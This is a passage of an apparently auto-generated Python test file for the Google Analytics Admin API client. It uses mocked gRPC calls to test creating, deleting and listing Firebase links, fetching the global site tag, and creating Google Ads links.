request_type=analytics_admin.CreateFirebaseLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.FirebaseLink( name="name_value", project="project_value", ) response = client.create_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateFirebaseLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.FirebaseLink) assert response.name == "name_value" assert response.project == "project_value" def test_create_firebase_link_from_dict(): test_create_firebase_link(request_type=dict) def test_create_firebase_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: client.create_firebase_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateFirebaseLinkRequest() @pytest.mark.asyncio async def test_create_firebase_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateFirebaseLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.FirebaseLink(name="name_value", project="project_value",) ) response = await client.create_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateFirebaseLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.FirebaseLink) assert response.name == "name_value" assert response.project == "project_value" @pytest.mark.asyncio async def test_create_firebase_link_async_from_dict(): await test_create_firebase_link_async(request_type=dict) def test_create_firebase_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateFirebaseLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: call.return_value = resources.FirebaseLink() client.create_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_firebase_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateFirebaseLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.FirebaseLink() ) await client.create_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_firebase_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.FirebaseLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_firebase_link( parent="parent_value", firebase_link=resources.FirebaseLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].firebase_link == resources.FirebaseLink(name="name_value") def test_create_firebase_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_firebase_link( analytics_admin.CreateFirebaseLinkRequest(), parent="parent_value", firebase_link=resources.FirebaseLink(name="name_value"), ) @pytest.mark.asyncio async def test_create_firebase_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.FirebaseLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.FirebaseLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_firebase_link( parent="parent_value", firebase_link=resources.FirebaseLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].firebase_link == resources.FirebaseLink(name="name_value") @pytest.mark.asyncio async def test_create_firebase_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_firebase_link( analytics_admin.CreateFirebaseLinkRequest(), parent="parent_value", firebase_link=resources.FirebaseLink(name="name_value"), ) def test_delete_firebase_link( transport: str = "grpc", request_type=analytics_admin.DeleteFirebaseLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteFirebaseLinkRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_firebase_link_from_dict(): test_delete_firebase_link(request_type=dict) def test_delete_firebase_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: client.delete_firebase_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteFirebaseLinkRequest() @pytest.mark.asyncio async def test_delete_firebase_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteFirebaseLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteFirebaseLinkRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_firebase_link_async_from_dict(): await test_delete_firebase_link_async(request_type=dict) def test_delete_firebase_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteFirebaseLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: call.return_value = None client.delete_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_firebase_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteFirebaseLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_firebase_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_firebase_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_firebase_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_firebase_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_firebase_link( analytics_admin.DeleteFirebaseLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_firebase_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_firebase_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_firebase_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_firebase_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_firebase_link( analytics_admin.DeleteFirebaseLinkRequest(), name="name_value", ) def test_list_firebase_links( transport: str = "grpc", request_type=analytics_admin.ListFirebaseLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListFirebaseLinksResponse( next_page_token="next_page_token_value", ) response = client.list_firebase_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListFirebaseLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListFirebaseLinksPager) assert response.next_page_token == "next_page_token_value" def test_list_firebase_links_from_dict(): test_list_firebase_links(request_type=dict) def test_list_firebase_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: client.list_firebase_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListFirebaseLinksRequest() @pytest.mark.asyncio async def test_list_firebase_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListFirebaseLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListFirebaseLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.list_firebase_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListFirebaseLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListFirebaseLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_firebase_links_async_from_dict(): await test_list_firebase_links_async(request_type=dict) def test_list_firebase_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListFirebaseLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: call.return_value = analytics_admin.ListFirebaseLinksResponse() client.list_firebase_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_firebase_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListFirebaseLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListFirebaseLinksResponse() ) await client.list_firebase_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_firebase_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListFirebaseLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_firebase_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_firebase_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_firebase_links( analytics_admin.ListFirebaseLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_firebase_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListFirebaseLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListFirebaseLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_firebase_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_firebase_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_firebase_links( analytics_admin.ListFirebaseLinksRequest(), parent="parent_value", ) def test_list_firebase_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_firebase_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.FirebaseLink) for i in results) def test_list_firebase_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) pages = list(client.list_firebase_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_firebase_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) async_pager = await client.list_firebase_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.FirebaseLink) for i in responses) @pytest.mark.asyncio async def test_list_firebase_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_firebase_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_global_site_tag( transport: str = "grpc", request_type=analytics_admin.GetGlobalSiteTagRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GlobalSiteTag( name="name_value", snippet="snippet_value", ) response = client.get_global_site_tag(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGlobalSiteTagRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GlobalSiteTag) assert response.name == "name_value" assert response.snippet == "snippet_value" def test_get_global_site_tag_from_dict(): test_get_global_site_tag(request_type=dict) def test_get_global_site_tag_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: client.get_global_site_tag() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGlobalSiteTagRequest() @pytest.mark.asyncio async def test_get_global_site_tag_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetGlobalSiteTagRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GlobalSiteTag(name="name_value", snippet="snippet_value",) ) response = await client.get_global_site_tag(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGlobalSiteTagRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GlobalSiteTag) assert response.name == "name_value" assert response.snippet == "snippet_value" @pytest.mark.asyncio async def test_get_global_site_tag_async_from_dict(): await test_get_global_site_tag_async(request_type=dict) def test_get_global_site_tag_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetGlobalSiteTagRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: call.return_value = resources.GlobalSiteTag() client.get_global_site_tag(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_global_site_tag_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetGlobalSiteTagRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GlobalSiteTag() ) await client.get_global_site_tag(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_global_site_tag_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GlobalSiteTag() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_global_site_tag(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_global_site_tag_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_global_site_tag( analytics_admin.GetGlobalSiteTagRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_global_site_tag_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GlobalSiteTag() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GlobalSiteTag() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_global_site_tag(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_global_site_tag_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_global_site_tag( analytics_admin.GetGlobalSiteTagRequest(), name="name_value", ) def test_create_google_ads_link( transport: str = "grpc", request_type=analytics_admin.CreateGoogleAdsLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) response = client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" def test_create_google_ads_link_from_dict(): test_create_google_ads_link(request_type=dict) def test_create_google_ads_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: client.create_google_ads_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateGoogleAdsLinkRequest() @pytest.mark.asyncio async def test_create_google_ads_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateGoogleAdsLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) ) response = await client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" @pytest.mark.asyncio async def test_create_google_ads_link_async_from_dict(): await test_create_google_ads_link_async(request_type=dict) def test_create_google_ads_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateGoogleAdsLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: call.return_value = resources.GoogleAdsLink() client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_google_ads_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateGoogleAdsLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with 